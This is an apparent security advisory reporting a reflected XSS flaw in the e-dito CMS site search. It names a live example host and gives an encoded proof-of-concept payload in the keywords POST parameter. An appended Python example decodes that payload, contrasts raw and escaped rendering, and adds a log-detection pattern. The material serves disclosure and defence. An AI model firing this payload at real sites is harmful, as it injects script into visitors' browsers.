e-dito CMS reflected XSS

2016.08.28
Implosion (FR)
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

----------------------------------------------------------------------
[Description]
#Exploit title: e-dito CMS reflected XSS
#Exploit author: Implosion
#Date: 28/08/2016
#Dorks: N/A
#Tested on: Firefox
----------------------------------------------------------------------
[Vulnerability]
#This reflected XSS is in the site search at /search/index.php (the keywords POST parameter is reflected into the response).
#POST DATA : phpMyAdmin=67f0f3645c2ba682499a4e4d47523392&phpMyAdmin=2QfN1PDOiWFbrApm8ZrN-5X5DF6&keywords=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28%2FOPENBUGBOUNTY%2F%29%3E%3C%22&x=26&y=14
----------------------------------------------------------------------
[Description]
e-dito is a professional content management system (CMS), powerful yet very simple to use. With all our plans, the software is installed and configured by our team. You simply enter your own texts, photos and videos in a few minutes, then manage your site without any technical knowledge!
----------------------------------------------------------------------
[Example]
#http://ca.e-dito.net//search/index.php
----------------------------------------------------------------------
#Discovered By Implosion
#Thanks to: NbSp_
----------------------------------------------------------------------
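Added example, not part of the advisory and not e-dito's code: it decodes the POST body quoted above, renders the keywords term into a hypothetical search-form template (the real e-dito template is not on the page) both raw and attribute-encoded, and shows a cheap log-triage check for the decoded parameter.

```python
import re
from html import escape
from urllib.parse import parse_qs

# Constructed from the form-encoded POST body quoted in the advisory
# (the two phpMyAdmin cookie-style parameters are left out).
POST_BODY = (
    "keywords=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28%2FOPENBUGBOUNTY%2F%29%3E%3C%22"
    "&x=26&y=14"
)

# Hypothetical search-form template; e-dito's actual markup is unknown.
FORM = '<input type="text" name="keywords" value="{value}">'

TAG_RE = re.compile(r"<[a-zA-Z]")


def keywords_from_body(body: str) -> str:
    """Decode the form body the way the search handler would see it."""
    return parse_qs(body).get("keywords", [""])[0]


def render_unsafe(keywords: str) -> str:
    # Vulnerable pattern: raw concatenation. The leading "> in the term
    # closes the value attribute and the <input> tag, so the rest of the
    # term is parsed by the browser as new markup.
    return FORM.format(value=keywords)


def render_safe(keywords: str) -> str:
    # Hardened: HTML attribute encoding with quotes escaped keeps the
    # whole term inside the attribute as inert text.
    return FORM.format(value=escape(keywords, quote=True))


def tag_count(html: str) -> int:
    """Number of element start tags in the fragment; a correctly
    encoded form yields exactly one (the <input> itself)."""
    return len(TAG_RE.findall(html))


def looks_like_markup_injection(keywords: str) -> bool:
    """Triage heuristic for access logs: flag a decoded search term that
    carries a tag opener or an inline event-handler attribute."""
    return bool(TAG_RE.search(keywords) or re.search(r"\bon\w+\s*=", keywords, re.I))


if __name__ == "__main__":
    term = keywords_from_body(POST_BODY)
    print("unsafe tags:", tag_count(render_unsafe(term)))  # 2
    print("safe tags:", tag_count(render_safe(term)))      # 1
    print("flagged:", looks_like_markup_injection(term))   # True
```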


Copyright 2021, cxsecurity.com
